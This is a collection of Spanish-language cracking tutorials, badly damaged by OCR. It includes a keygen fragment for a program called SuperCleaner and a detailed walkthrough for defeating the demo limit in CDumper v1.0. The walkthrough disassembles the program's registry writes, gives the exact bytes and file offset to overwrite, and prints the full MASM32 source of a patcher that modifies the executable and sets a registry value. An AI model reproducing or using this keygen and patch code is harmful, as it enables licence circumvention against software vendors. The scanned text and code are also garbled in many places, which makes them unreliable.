HKEY_CURRENT_USERI Softwarel SuperCleaner Registration 


Code 720-xxxXX-YYY-ZZZZ 
Name OGZRIP 


Por descontado si borramos las claves volveremos a estar con el programa sin registar. 


Generador de claves 


Private Sub Generador_Click() 

Dim user_name As String 

Dim L As Integer, x As Integer 

Dim key1 As Double, key2 As Double, key3 As Double, key4 As Double 
user_name = Text1.Text 

L = Len(user_name) 


x=0 

key1 = 0 
key2 = 0 
key3 = 0 
key4 = 0 
For x = 1 To L 


user_name = Asc(Mid$(Textl.Text, x, 1)) + 38 

keyl1 = key1 + user_name 

user_name = Asc(Mid$(Text1.Text, x, 1)) * xx “El número xx lo teneis que descubrir , lo siento 
key2 = key2 + user_name 

user_name = Asc(Mid$(Text1.Text, x, 1)) + yy “El número yy lo teneis que descubrir , lo siento 
key3 = key3 + user_name 

user_name = Asc(Mid$(Text1.Text, x, 1)) * zz “El número zz lo teneis que descubrir , lo siento 
key4 = key4 + user_name 

Next x 

For x = 1 To L 

If Asc(Mid$(Text1.Text, x, 1)) > 126 Then “Al utilizar la función ADD que no tiene en cuenta el acarreo da 
errores si pasamos de códigos mayores de 126 

MsgBox "Nombre no válido , sólo números y letras sin acentuar, vbExclamation" 

Text2.Text = "" 

Exit For 

Else 

Text2.Text = CStr(keyl 6 "-" € key2 € "-" € key3 € "-" € key4) 'Visualizamos el Serial 

End If 

Next x 

End Sub 

Private Sub Exit_ Click() 

End 

End Sub 


CONCLUSIONES 


Espero que lo hayais entendido , he de reconocer que me cuesta bastante más el hacer el tutorial en sí que 
desproteger el programa , cada día me parece más " coñero " esto del HTML. Como siempre si quereis 


preguntarme algo me encontrareis aquí : OGZRIP . Un abrazo. 
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Programa: | CDumper v1.0 


PROTECCION: Simular estar registrados mediante un patch. 


Descripcion: Reproductor de CDs con ecualizador de sonido. 


Dificultad: Novato, Facililla, Media, Avanzado, Difícil, Elite, 
DOWNLOAD: http: //www.gmixon.com 


Para el patch: W32dasm y MASM32. 
Para el KeyGen: File Inspector, DeDe 3.0, SoftICE, las anteriores. 


Herramientas: 


crac: SACCOPHARYNX — rrcmn: [15/02/2002 


INTRODUCCION 


Saludos a todos: 


Aquí tienen mi cuarto tutorial, el primero de este 2002. Antes que nada, 
a todos los colegas que me mandaron e-mails acerca de mis tutoriales 
anteriores, les quiero decir gracias por invertir su tiempo en aprender 


con ellos. Me alegro que les hayan servido, y que les haya gustado la 
explicación en los mismos. Bueno amigos, manos a la obra, JeJejJe... 


AL ATAKE 


Intro 


Creo que a esta víctima (CDumper v1.0) le tenía ganas desde mucho antes de 
introducirme en este hermoso mundo del cracking. Obviamente mi falta de conocimientos 
en aquel entonces solo produjo resultados sin éxito, por eso estoy aquí nuevamente, 
en busca de la revancha para que los programadores de CDumper no se la lleven de 
arriba. 


Presentando a la víctima 


Como con los reproductores comunes de CDs (Windows Media Player, Winamp, CDplayer, 
etc), solo podemos reproducir el sonido de un CD, y no ecualizarlo a nuestro gusto, 
es que he seleccionado a esta víctima, con la cual podemos lograr esto. 


Pero, cómo con CDumper v1.0 sí y con los comunes no? 


Bueno, es sencillo. Los reproductores comunes de CD sólo ponen en PLAY la unidad de 
CD-ROM y no procesan ninguna señal. El audio sale a través del cable que va conectado 
desde nuestra unidad de CD-ROM a la placa de sonido, y de esta va directamente a los 
parlantes. O sea, la CPU no procesa nada. Esta maravilla de programa trabaja de forma 
distinta. Si eliminamos el cable que va desde nuestra unidad de CD-ROM a la placa de 
sonido, oiremos música igual. Por qué? Porque este programa lo que hace en realidad 
es una EXTRACCION DIGITAL DE AUDIO (lo mismo que los programas que graban CDs). El 
sonido en lugar de salir por el cable que va a la placa de sonido, sale por el bus de 
datos, luego es procesado según nuestras preferencias seteadas en el ecualizador, y 
luego se manda la señal ya procesada a la placa de sonido. Es por eso que podremos 
disfrutar de nuestros CDs a pleno. 


Fanáticos de la música no se pierdan este tutorial. 


Manos a la obra 


Bueno, el objetivo de este tutorial es aprender un poco acerca de las APIs de Window$ 
que controlan la registry, para usar esos conocimientos en la realización de un patch 
en assembler, para simular que estamos registrados. Este patch no solo escribe una 
entrada en la resgistry, sino que también parchea unos bytes en CDumper.exe. El patch 
lo haremos en MASM32, por lo tanto recomiendo bastantes conocimientos de assembler 
para que este tutorial no resulte muy difícil. Igualmente tartaré de explicar de la 
mejor manera posible. Luego, al final, les mostraré que existe otro punto de ataque, 
pero la idea de este tutorial es hacer algo distinto a lo que venimos haciendo y 
programar un poco más. 


Pero antes de hacer un patch debemos conocer como trabaja nuestra víctima. Entonces 
vamos a inspeccionarla. 


Una vez que instalamos el CDumper v1.0 ponemos un CD de audio en nuestra lectora de 
CDs y ejecutamos el programa. Ni bien hacemos esto ya aparece la primera nag 
molestándonos: 


AA xl 
This is a demo version of CDumper. 
You will be allowed to play the first 3 CDs that you load as many times as you want. 


la cual nos dice que es una versión demo y que sólamente podremos reproducir tres 
CDs, las veces que queramos, pero solo tres. Con mi extensa colección de CDs, solo 
reproducir tres? jejejejeje, qué cargada es esa? 


Si analizamos un poco la situación, es obvio que en algún lugar se guardan la 
cantidad de CDs reproducidos y algún identificadr de los mismos para saber cuales 
fueron reproducidos y cuales no. Si buscamos en el directorio dónde instalamos 
CDumper no hay rastros, por lo tanto vamos a la REGISTRY. Para los que no tengan idea 
de lo que es la registry, ojo con lo que hacen de ahora en más, no arruinen su 
Window$, Jejeje. 


Vamos a Inicio->Ejecutar, escribimos regedit seguido de ENTER, y accedemos al editor 
de la registry de Window$. Una vez aquí vamos a HKEY_LOCAL MACHINEXSOFTWARE y veremos 
que nuestra víctima generó una entrada llamada GMixon y otras más que dependen de 
esta: 


2. Editor del Begístro _- HA E [aj xj 
Registo Edición Wer Favontos Ayuda 
E GMixon m7 
5-4 CDumper 
a Y 
6-4 CD Devices 
(Y CD Device_CD-AB5S (0: 


[valor no establecido] 
01 00 00 00 38 00 00 00 3: 
DataCount Ox00000055 (85) 

22] Demohsg 0x00000001 (1) 


i Po CD Device_CD-ROM CD-532€ 1 53) 0x00009166 (37302) 
p emo 
(Y Karaoke 
¿(E Sound Devices 
5-44 CDumper Demo 


da (3 1.0 y 
4 » 


Mi PCIHKEY_LOCAL_MACHINENSOFTWAREAGMixoniCDumperiDemo L 


Si observan bien, la entrada con los datos más interesantes es 
HKEY_LOCAL_ MACHINEXSOFTWAREAMGMixonxCDumperiDemo (la que se observa en la imagen de 
arriba): 


Data => El primer dato de este valor es 01, el cual nos indica la catidad de 
CDs que hemos reproducido ya. El resto de los datos se usan para 
identificar a los CDs, para saber si es uno nuevo o no, e 
incrementar o no, el dato 01. Es obvio que cuando se llega a 03 
fuimos historia. 


DataCount y Test => Aparentemente se usan en conjunto para hacer alguna 
especie de chequeo que muy bien no les funcionó a los 
programadores, JejejJe]Je. 


DemoMsg => Como se puede observar contiene un 1. Si cierran CDumper y lo 
ejecutan otra vez notarán que la molesta nag no aparece. Que quiere 
decir eso?, Que si DemoMsg está en 1 no debe mostrarnos nuevamente 
la nag, Jejeje. 


Ahora que ya tenemos bastante información, pensemos un poco. Nuestra víctima de 
alguna forma escribe valores en la registry de Window$. Bueno, si buscamos en nuestra 
Referencia de APIs (si no la tienen recomiendo que la bajen de internet porque es muy 
útil, http://spiff.tripnet.se/-iczelion/files/win32api.zip), la API que escribe la 


Registry es RegSetValue o RegSetValueExa. Lo que debemos hacer entonces es buscar en 
CDumper.exe donde se efectua la llamada a esta API, para lo cual lo desensamblamos 
con W32Dasm. Una vez desensamblada la víctima vamos a Search->Find Text y buscamos 
RegSetValue. 


La primer aparición no nos interesa, solo dice que es un módulo importado desde 
advapi32.d11. Buscamos otra vez dando F3 y llegamos a la segunda aparición que es 
solo un salto a la tercera y última de todas, la cual si nos interesa y mucho: 


7004A85E3 SBFO mov esi, eax 

004A85E5 8B450C mov eax, dword ptr [ebp+0C] 
:004A85E8 50 push eax 

2004A85E9 SB45FC mov eax, dword ptr [ebp-04] 
3004A85EC 50 push eax 

:004A85ED 56 push esi 

004A85EE 6400 push 00000000 

2004A85FO0 S8BC7 mov eax, edi 

3004A85F2 ESFIBAFSFF call 004040ES 

:004A485F7 50 push eax 

:004A485F8 28B4304 mov eax, dword ptr [ebx+04] 
004A85FB 50 push eax 


* Reference To: advapi32.PegSerValueExA, Ord: 0000h 
| 


Bien, como dijimos anteriormente la idea no es parchear la víctima con un editor 
Hexa, sino hacer un patch en Win32Asm con MASM32, para lo cual debemos saber que es 
lo que debemos parchear. Esta vez no vamos a andar parcheando simples saltitos (Jmp, 
je, etc). Como se habrán dado cuenta la idea es parchear la escritura de datos en la 
registry, por lo tanto antes debemos saber como funciona la API RegSetValueExa. Aquí 
les describo los parámetros que se le pasan a la misma: 


LONG RegSetValueEx ( 


HKEY hKey, // Es el handle de la entrada donde escribiremos el valor. 
LPCTSTR lpValueName, // Es la dirección del nombre del valor a escribir. 

DWORD Reserved, // Reservado para uso futuro. Le pasaremos un NULL. 

DWORD dwType, // Flag que nos indica el tipo de valor a escribir. 

CONST BYTE *lpData, // Es la dirección de los datos del valor a escribir. 
DWORD cbData // Es el tamaño de los datos del valor a escribir. 


y; 


Ahora que ya sabemos esto, si observan la llamada de la posición :004A85FC, muchos se 
preguntarán, dónde se pasan todos estos parámetros?. Bueno, si no se usa la sentencia 
invoke de MASM32, la forma de pasar los parámetros es ponerlos en la pila (stack) 
mediante sentecias push antes del call, en orden inverso debido a que en una pila, 
siempre, el último en poner es el primero en sacar. Entonces: 


:004A85E8: => Pone en la pila DWORD cbData. 
:004A85EC: => Pone en la pila CONST BYTE *lpData. 
:004A85ED: => Pone en la pila DWORD dwType. 
:004A85EE: -> Pone en la pila DWORD Reserved. 
:004A85F7: => Pone en la pila LPCTSTR l1lpValueName. 
:004A85FB: => Pone en la pila HKEY hKey. 


Luego viene el call. 


Bien, una cosa a tener en cuenta es que nuestra víctima siempre usa este código para 
escribir en la registry, porque no hay más llamadas a esta API, por lo tanto hay que 
tener cuidado como parcheamos este código, porque es obvio que afectaremos a todas 
las escrituras en la registry. Analizando la situación, creo que la mejor opción es 
pasarle un NULL en el parámetro correspondiente a CONST BYTE *lpData, porque de esta 
forma tendremos un puntero nulo que no apunta a ningún dato, entonces no se escribirá 
absolutamente nada en la registry (ningún dato para ninguno de los valores de las 
entradas generadas en HKEY_LOCAL MACHINEXNSOFTWARENMGMixonX). Para lograr esto debemos 
hacer los siguientes cambios: 


Las instrucciones: 


dirección codificación ¡instrucción 
:004A85E9  8B45FC mov eax, dword ptr [ebp-04] 
:004A85EC 50 push eax 


debemos cambiarlas por: 
dirección codificación ¡instrucción 


:004A85E9 6A00 push 00000000 
:004AB8B5EB 90 nop 
:004A85EC 90 nop 


o sea, cuatro bytes se cambian por otros cuatro bytes, para no alterar el tamaño 
del archivo (CDumper.exe): 


8B -> 6A 
45 -> 00 
Fc -> 90 
50 -> 90 


Listo, ya sabemos que hay que cambiar para lograr que no se escriban datos en la 
registry. Solo nos falta saber el desplazamiento (offset) que hay hasta los bytes que 
vamos a cambiar. Como estos bytes comienzan en la dirección :004A85E9, solo tenemos 
que posicionarnos en esta línea dentro de W32Dasm. Una vez hecho esto veremos el 
desplazamiento abajo de todo, el cual es: 


a79e9 (En hexadecimal). 
686569 (En decimal). 


Antes de hacer el patch en assembler hice los cambios con un editor Hexa y probé los 
resultados. Funcionó de maravillas, asique luego puse manos a la obra en el patch. 
Existe un pequeño costo extra al impedir que se escriban datos en los valores de las 
entradas de la registry: 


Este costo es que no se escribirá el dato del valor DemoMsg. Entonces siempre 
aparecerá esa molesta nag? Noooooooooooooooo0o0o. Claro que no. Aprovecharemos el patch 
del archivo CDumper.exe y crearemos esa entrada en la registry y le pondremos un 1 
como dato en el valor DemoMsg, Jejeje. Todo en el mismo patch, y de esa forma 
eliminaremos la molesta nag. 


Bueno, ahora que vimos como funciona nuestra víctima, vamos a desinstalarla (Inicio- 
>Panel De Control->Agregar o Quitar programas) y a borrar la entrada GMixon que 
generó en la registry. Esto lo hacemos porque en la primer ejecución, al no estar 
parcheado CDumper.exe, escribió datos en los valores de la registry, lo cual no 
queremos que suceda, Jejeje. Ahora sí, se viene el patch en assembler para Win32 
hecho con MASM32. 


Código fuente del patch y su explicación 


Antes que nada les quiero decir que los siguientes códigos fuente (rsrc.rc y 
CDumperPatch.asm) se puden bajar enteros desde aquí: CDumperPatchSrc.zip 


El primero de los códigos fuente corresponde a rsrc.rc 
El código será explicado por partes y evitaré explicar 
mismo código fuente. 


Código fuente de rsrc.rc 


y el otro a CDumperPatch.asm. 
lo que está explícito en el 


finclude "c:imasm32lincludelresource.h" 


Hdefine IDC_STATIC -1 

fdefine IDD_DIALOG 1000 

Hdefine IDC_SERIAL 1002 

Hdefine IDC_EXIT 1003 

fdefine IDC_ABOUT 1004 

fdefine IDC_CRACKEAR 1005 

app ICON gulper2.ico ¿ícono del patch 
IDD_DIALOG DIALOG 100,100,229,098 ¡tamaño del dialog box 


¡Estilo del Dialog Box 


STYLE WS_CAPTION | DS_CENTER | WS_SYSMENU |WS_MINIMIZEBOX 


CAPTION "CDumper v1.0 Patch" 


¡Tipografía y tamaño 
FONT 8, "MS Sans Serif" 


BEGIN 
GROUPBOX "Cracker", IDC_STATIC,8,6,214,20 
LTEXT "SACCOPHARYNX", IDC_STATIC,55,14,115,8,ES_CENTER 
GROUPBOX "Website", IDC_STATIC, 8,28,214,20 
LTEXT "http: //www.gmixon.com", IDC_STATIC,55,36,115,8,ES_CENTER 
GROUPBOX "Registro", IDC_STATIC,8,50,214,40 
PUSHBUTTON "¿Crackear",IDC_CRACKEAR, 35,65,50,14 
PUSHBUTTON "SgAcerca de", IDC_ABOUT, 90,65,50,14 
PUSHBUTTON "Salir", IDC_EXIT,144,65,50,14 
END 


Como puede observarse claramente en rsrc.rc se definen 
de nuestro patch (botones, ícono, tipografía, estilos, 
c:imasm32Xincludelresource.h lo incluimos porque en el 


Características (WS_CAPTION, DS_CENTER, ES_CENTER, etc. 


los controles y la apariencia 
etc.). El archivo 
están definidas muchas 


). 


Código fuente de CDumperPatch.asm 
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, 
.386 

.model flat,stdcall 
option casemap:none 


include Iimasm32lincludeNwindows.inc 
include Iimasm32lincludeluser32.inc 

include imasm32lincludelkernel32.inc 
include IWmasm32lincludel*comdlg32.inc 
include Imasm32lincludeladvapi32.inc 


includelib Imasm321libluser32.1lib 

includelib Amasm3211liblkernel32.lib 
includelib Amasm3211iblcomd1lg32.1lib 
includelib Iimasm32Xlibladvapi32.1lib 


Dl1lgFunc PROTO :DWORD, : DWORD, :DWORD, :DWORD 
PatchFile PROTO :BYTE, :DWORD 

WriteRegistry PROTO :DWORD 

ControlDeArchivo PROTO :DWORD 

CerrarArchivo PROTO :DWORD 


De este código lo que más importa son los 5 procedimientos definidos: 


Dl1lgFunc -> Controla el DialogBox que usamos para el patch. 

PatchFile -> Realiza el parcheo de CDumper.exe. 

WriteRegistry -> Escribe 1 como dato del valor DemoMsg en la Registry. 
ControlDeArchivo -> Chequea que CDumper.exe sea v1.0 y que no esté parcheado ya. 
CerrarArchivo -> Cierra CDumper.exe si fue abierto y libera la memoria. 
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. const 

IDD_DIALOG equ 1000 ; Este es el identificador del Dialog Box 
IDC_SERIAL equ 1002 ; 

IDC_EXIT equ 1003 ; Son los mismos identificadores de controles 
IDC_ABOUT equ 1004 ; definidos en rscr.rc 


IDC_CRACKEAR equ 1005 


MAXSIZE equ 260 ; Tamaño máximo del nombre del archivo (incluido el path). 
MEMSIZE equ 10 ; Pongo 10 porque se leen 9 valores (MEMSIZE-1). 
D_OFFSET equ 686569 ; Desplazamiento que hay hasta los bytes a parchear 


En esta sección se definen las constantes que tendrá el patch. MAXSIZE, MEMSIZE y 
D_OFFSET son tamaños medidos en bytes y en notación decimal. MEMSIZE es el tamaño de 
la memoria donde se copiarán los cuatro bytes a parchear, más los otros cinco que 
usaré para ControlDeArchivo. 
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. data 

bytescorrectos db 8Bh,45h,0FCh, 50h,56h, 6Ah, 00h, 8Bh, 0C7h 
ofn OPENFILENAME <> 

FilterString db "CDumper.exe",0,"CDumper.exe",0,0 
buffer db MAXSIZE dup(0) 

Icono db "app",0 

Iconimage db "app",0 

hIcon da 0 

hWnd da 0 


¿MANEJO DE MENSAJES 


MsgCaption db "CDumper v1.0 Patch",0 
MsgBoxText4 db "CDumper v1.0 patched 0OK.",0 
ErrorMessagel db "Error abriendo archivo!!!",0 


ErrorMessage2 db "Error inesperado de memoria!!!",0 


ErrorMessage3 db "Error inesperado de archivo!!!",0 


ErrorMessage4 db "Error de lectura de archivo!!!",0 
ErrorMessageb db "Error de escritura de archivo!!!",0 
ErrorMessage6 db "No se seleccionó ningún archivo!!!",0 


ErrorMessage7 db "CDumper.exe versión distinta o ya parcheada",0 

ErrorMessage8 db "Error escribiendo CLAVE en Registry",0 

ErrorMessage9 db "Error escribiendo VALOR en Registry",0 

ErrorMessagel0 db "Error cerrando Registry",0 

txtl db "Desde las profundidades del abismo, SACCOPHARYNX / [13/02/2002]" 


¿MANEJO DE REGISTRY 


sSubKey db "SOFTWARENGMixon*CDumperADemo",0 
SNamel db "DemoMsg",0 
Datol dd 1 


Aquí definimos los datos inicializados: bytescorrectos son los bytes originales de 
CDumper.exe y los uso para control; ofn es una estructura necesaria para el manejo 
archivos; buffer contendrá el path y el nombre del archivo a parchear (que como se 
en FileString este será Cdumper.exe); sSubKey contiene el nombre de la entrada que 


¿0 


de 
ve 


crearemos en la registry; sNamel contiene el nombre del único valor que escribiremos 


en esta entrada, y Datol es el dato que escribiremos en el valor DemoMsg. El resto 
para el manejo del ícono del patch, los handles necesarios y los mensajes. 
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.data? 

hInstance HINSTANCE ? 
hFile HANDLE ? 
hMemory HANDLE ? 
pMemory DWORD ? 
SizeReadWrite DWORD ? 
phKey dd ? 


phDisposition dd ? 


En esta sección se definen los datos no inicializados para el manejo de instancias, 
archivos y memoria. 


; 
. code 
start: 
invoke GetModuleHandle, NULL 
mov hInstance,eax 
invoke DialogBoxParam,hInstance, IDD_DIALOG,NULL,addr DlgFunc, NULL 
invoke ExitProcess,NULL 


Aquí comienza la sección de código. Se obtiene el handle del módulo, se invoca a 
DialogBoxParam, diciendo que DlgFunc es el procedimiento que controlará los eventos 
de este Dialog Box (IDD_DIALOG), y que cuando salgamos del Dialog Box se invoque a 
ExitProcess para terminar la ejecución de nuestro patch. 


r 
DlgFunc proc hDl1g:DWORD, uMsg: DWORD, wParam:DWORD, lParam: DWORD 
.1f uMsg==WM_INITDIALOG 

¿Inicializa el DialogBox 

mov eax,hDlg 

mov hWnd, eax 

invoke LoadIcon,hInstance,ADDR Icono 

mov hlIcon,eax 

invoke SendMessage, hDlg, WM_SETICON,1,hIcon 


es 


¿Inicializa los miembros de la estructura OPENFILENAME 
mov ofn.lStructSize,SIZEOF ofn 

push hWnd 

pop ofn.hWndOwner 

push hInstance 

pop ofn.hInstance 

mov  ofn.lpstrFilter, OFFSET FilterString 


mov  ofn.lpstrFile, OFFSET buffer 
mov  ofn.nMaxFile,MAXSIZE 


.elseif uMsg==WM_CLOSE 
invoke EndDialog,hDlg,NULL 


Comienza el procedimiento DlgFunc el cual procesa los mensajes enviados a nuestro 
DIALOG BOX. Como se ve aquí, si el DIALOG BOX recibe el mensaje WM_INITDIALOG 
inicializo el handle, el ícono y la estructura necesaria para el manejo de archivos. 
Cuando recibe el mensaje WM_CLOSE se debe cerrar el DIALOG BOX para lo cual invocamos 
a EndDialog. 


.elseif uMsg==WM_COMMAND 
mov eax,wParam 
mov edx,eax 
shr edx,16 
.1f dx==BN_CLICKED 
.1f ax==IDC_EXIT 


7 
; EXIT (SALIR) 
7 


invoke SendMessage,hDlg,WM_CLOSE,0,0 


.elseif ax==IDC_CRACKEAR 
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¿ COMIENZO DE LA OPERACION DE CRACKING (CRACKEAR) 


7 


invoke PatchFile,1,hDlg 


.1f eax == 6666 ¡Se escribió correctamente el archivo. 
invoke WriteRegistry,hDlg 
.1f eax == 6666 ¡Se escribió correctamente la registry. 


invoke MessageBox, Y 
hDl1g, ADDR MsgBoxText4, Á 
ADDR MsgCaption, A 


MB_OK 
.elseif ¿Si la registry se escribió mal restauro el archivo. 
invoke PatchFile,0,hDlg 
.endif 
.endif 


.elseif ax==IDC_ABOUT 


F 
; ABOUT (ACERCA DE) 
; 
invoke MessageBox,hDl1g,ADDR txt1,ADDR MsgCaption,MB_OK 
.endif 
.endif 

.endif 

ret 

DlgFunc endp 


Cuando el DIALOG BOX recibe el mensaje WM_COMMAND quiere decir que uno de los botones 


definidos en rsrc.rc pudo haber sido clickeado, eso es lo que controlaremos aquí. El 
que más nos importa es IDC_CRACKEAR, ya que aquí se harán las operaciones necesarias 
para el patch. Si al retorno de PatchFile eax vale 6666 quiere decir que CDumper.exe 
se parcheó correctamente, entonces procedemos a escribir la entrada en la registry 
invocando WriteRegistry. Si la entrada se escribió correctamente eax volverá a valer 
6666 y el patch funcionó a la perfección. Si no se pudo escribir con éxito la entrada 
en la registry, restauro los bytes originales de CDumper.exe y todo queda como estaba 
antes (el patch no cambia nada). Tanto para escribir los bytes originales, como los 
del patch uso el mismo procedimiento (PatchFile), por eso el primer parámetro que le 
paso es un flag, que está en 1 (para parchear) o en 0 (para escribir los bytes 
originales si hubo un error). 


Bueno, esa es la estructura principal del patch. Ahora entraremos en más detalles. 


r 
PatchFile PROC dbFlag:BYTE,hDl1g: DWORD 
.1f dbFlag == 1 
mov ofn.Flags, OFN_FILEMUSTEXIST or A 
OFN_PATHMUSTEXIST or OFN_LONGNAMES or 
OFN_EXPLORER or OFN_HIDEREADONLY 
invoke GetOpenFileName, ADDR ofn 
.else 
mov eax,1l 
.endif 


¿Si no hubo error y se seleccionó un archivo sigue. 
.1f eax==TRUE 


Comenzamos con el procedimiento PatchFile. La API GetOpenFileName es la que nos deja 
seleccionar un archivo. En este Caso el que queremos parchear. Pero antes de 
invocarla debemos saber si estamos parcheando el archivo, o si estamos restaurando 
los bytes originales. Porque si estamos restaurando los bytes originales debido a un 
error en la escritura de la registry, ya habíamos seleccionado el archivo y no hace 
falta hacerlo nuevamente. Si eax es TRUE (distinto de cero) no hubo error al 
seleccionar el archivo y podemos empezar con el patch. El registro eax solo valdrá 
6666 en PatchFile cuando se llegue al final del procedimiento (antes del último ret). 


; Abro el archivo seleccionado; CreateFile también abre archivos 


r 
invoke CreateFile, ADDR buffer,NX 
GENERIC_READ or GENERIC_WRITE ,A 
FILE_SHARE_READ or FILE_SHARE _WRITE,NX 
NULL, OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE, NX 
NULL 
; Control de error de apertura de archivo 
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.1f eax == INVALID_HANDLE_VALUE 
invoke MessageBox, hDlg,ADDR ErrorMessagel, ADDR MsgCaption, MB_OK 
ret 

.endif 


mov hFile,eax 


; Obtengo el handle de la memoria a utilizar para alojar los bytes a leer 


7 
invoke GlobalAlloc,GMEM_MOVEABLE or GMEM_ZEROINIT,MEMSIZE 
; Control de error de Memoria 
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.1f eax == NULL 


invoke MessageBox, hDlg,ADDR ErrorMessage2, ADDR MsgCaption, MB_OK 
invoke CerrarArchivo, eax 
ret 

.endif 

mov hMemory,eax 


; Obtengo el puntero a la zona de memoria donde se alojarán los bytes a leer 


, 
invoke GlobalLock,hMemory 
; Control de error de Memoria 


r 
.1f eax == NULL 
invoke MessageBox, hDlg,ADDR ErrorMessage2, ADDR MsgCaption, MB_OK 
invoke CerrarArchivo, eax 
invoke GlobalFree, hMemory 
ret 
.endif 
mov pMemory,eax 


; Pongo el puntero de archivo apuntando a los bytes a parchear. 


, 
invoke SetFilePointer,hFile,D_OFFSET,NULL,FILE_BEGIN 
¿ Control de error de búsqueda en archivo 


r 
.1f eax == OFFEFFEEFEA 
invoke MessageBox, hDl1g,ADDR ErrorMessage3, ADDR MsgCaption, MB_OK 
invoke CerrarArchivo, eax 
ret 
.endif 


; Leo del archivo los bytes para control y modificación del mismo. 


, 
invoke ReadFile,hFile,pMemory,MEMSIZE-1,ADDR SizeReadWrite, NULL 
¿ Control de error de lectura en archivo 


r 
.1f eax == 0 
invoke MessageBox, hDlg,ADDR ErrorMessage41, ADDR MsgCaption, MB_OK 
invoke CerrarArchivo, eax 
ret 
.endif 


Esta parte no presenta complicaciones si observan bien. Está dividida claramente en 
cinco pasos Cada uno de los cuales dice que es lo que hace, y además todos presentan 
la misma estructura: Se invoca una API y luego se controla si hubo un error o no 
mediante el valor que tenga el registro eax. Pueden ver que si hubo un error eax no 
vale 6666, se despliega el mensaje correspondiente, se invoca al procedimiento 
CerrarArchivo y retornamos a DlgFunc. Los valores retornados por las APIs en eax y 
los parámetros que se les pasan a las mismas, los tomé de La Referencia de APIs, por 
eso anteriormente les dije que la bajen de internet ya que es de mucha utilidad. No 
vayan a pensar que yo sabía todo eso por arte de magia. 


¿ Controlo que sea el CDumper v1.0 antes de parchear. 
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.1f dbFlag == 1 
invoke ControlDeArchivo, pMemory 
.1f eax == 666 


invoke MessageBox, hDl1g,ADDR ErrorMessage7, ADDR MsgCaption, MB_OK 


invoke CerrarArchivo, eax 
ret 
.endif 
.endif 


Si dbFlag vale 1 quiere decir que estoy intentando parchear Cdumper.exe y no 
restaurando los bytes originales. Eso lo hago porque si hay un error escribiendo la 
registry, no me dejaría restaurar los bytes originales de CDumper.exe, porque me 
diría que el archivo ya fue parcheado. Luego invoco a ControlDeArchivo y si este 
procedimiento retorna un 666 en eax quiere decir que CDumper.exe no es v1.0 o que ya 
fue parcheado. 


; Escribo el patch en memoria dependiendo del Flag 
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push edi 
mov edi, pMemory 
.1f dbFlag == 1 


mov byte ptr [edil, 6ah 
mov byte ptr [edi+1], 00h 
mov byte ptr [edi+2], 90h 
mov byte ptr [edi+3], 90h 

.elseif 
mov byte ptr [edil], 8Bh 
mov byte ptr [edi+1], 45h 
mov byte ptr [edi+2], OFCh 
mov byte ptr [edi+3], 50h 

.endif 

pop edi 


Antes de escribir el patch o la restauración en el archivo CDumper.exe debemos 
escribir los cambios en la memoria. Para lo cual movemos pMemory a edi, para que edi 
contenga un puntero a la zona de memoria donde se leyeron los bytes del archivo. Una 
vez hecho esto vamos incrementando en uno este puntero y copiamos los bytes según 
corresponda, dependiendo del valor del flag. 


; Retorno el puntero al lugar correcto porque avanzó los bytes que se leyeron 


, 
invoke SetFilePointer,hFile,D_OFFSET,NULL,FILE_BEGIN 
¿ Control de error de búsqueda en archivo 


r 
.1f eax == OFFEFFEEFEA 
invoke MessageBox, hDl1g,ADDR ErrorMessage3, ADDR MsgCaption, MB_OK 
invoke CerrarArchivo, eax 
ret 
.endif 


; Escribo los cambios (el patch) en el archivo 


, 
invoke WriteFile,hFile,pMemory,MEMSIZE-1,ADDR SizeReadWrite, NULL 
¿ Control de error de escritura en archivo 


E 
.1f eax == 0 
invoke MessageBox, hDl1g,ADDR ErrorMessage5, ADDR MsgCaption, MB_OK 
invoke CerrarArchivo, eax 
ret 
.endif 


Las dos partes de código de arriba funcionan igual que las cinco anteriores. Pero 


cabe una explicación extra: cuando leemos bytes de un archivo a partir de una 
posición, el puntero del archivo avanza la cantidad de bytes que leímos, por lo tanto 
antes de hacer la escritura del archivo, debemos poner el puntero nuevamente en el 
mismo lugar en el que estaba justo antes de la lectura, porque lo que nosotros 
queremos es sobreescribir los bytes leídos. 


¿ Si llegamos hasta aquí y no hubo errores, entonces delvuelvo 6666 en eax 


7 
invoke CerrarArchivo, eax 
mov eax, 6666 


ret 

.elseif 
invoke MessageBox, hDl1g,ADDR ErrorMessage6, ADDR MsgCaption, MB_OK 
ret 

.endif ; Este .endif cierra .if eax==TRUE 


PatchFile ENDP 


No hay más que explicar con respecto a ese código. Basta con la explicación en él 
incluída. Aquí se terminó el procedimiento PatchFile. 


7 
WriteRegistry PROC hDlg: DWORD 
¿ CREAR ENTRADA EN LA REGISTRY 


F 
invoke RegCreateKeyEx, HKEY_LOCAL MACHINE, addr sSubKey, NULL, NULL, 
REG_OPTION_NON_VOLATILE, KEY_ WRITE, NULL, addr phKey, 

addr phDisposition 
¿ Chequea si no hubo error en crear la entrada en registry 


r 
.1f eax != ERROR_SUCCESS 
invoke MessageBox, hDl1g,ADDR ErrorMessage8, ADDR MsgCaption, MB_OK 
invoke CerrarArchivo, eax 
ret 
.endif 


¿ ESCRITURA DEL VALOR DE DemoMsg EN REGISTRY 


, 

invoke RegSetValueEx, phKey, addr sNamel, NULL, REG_DWORD, addr Datol, 
SIZEOF Datol 

¿ Chequea si no hubo error en la escritura 


r 
.1f eax != ERROR_SUCCESS 

invoke MessageBox, hDl1g,ADDR ErrorMessage9%, ADDR MsgCaption, MB_OK 

.1f phDisposition == REG_CREATED_NEW_KEY 

invoke RegDeleteKey, phKey, addrs SubKey 
.elseif 
invoke RegCloseKey, phKey 

.endif 

invoke CerrarArchivo, eax 

ret 
.endif 


¿ CERRANDO ENTRADA EN LA REGISTRY 
, 
invoke RegCloseKey, phkKey 

¿ Chequea si no hubo error en el cierre 
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.1f eax !|= ERROR_SUCCESS 


invoke MessageBox, hDlg,ADDR ErrorMessagel0, ADDR MsgCaption, MB_OK 
invoke CerrarArchivo, eax 
ret 

.endif 


; Si llegamos hasta aquí y no hubo errores, delvuelvo 6666 en eax 


, 

mov eax, 6666 

ret 
WriteRegistry ENDP 


Este es el procedimiento que escribe la entrada en la registry. Presenta la misma 
estructura que el procedimiento anterior y no merece mucha explicación. Antes de 
escribir un valor y su dato en la registry, necesitamos abrir o crear una entrada en 
. Si todo 


la cual lo escribiremos, y luego de la escritura se debe cerrar la entrada 
funcionó bien retornamos 6666 en eax. Si hubo un error al intentar escribi 


r la 


registry borramos la entrada (Key), solo si esta fue creada por nuestro patch. 


existía no se borra, solo cerramos dicha entrada. 


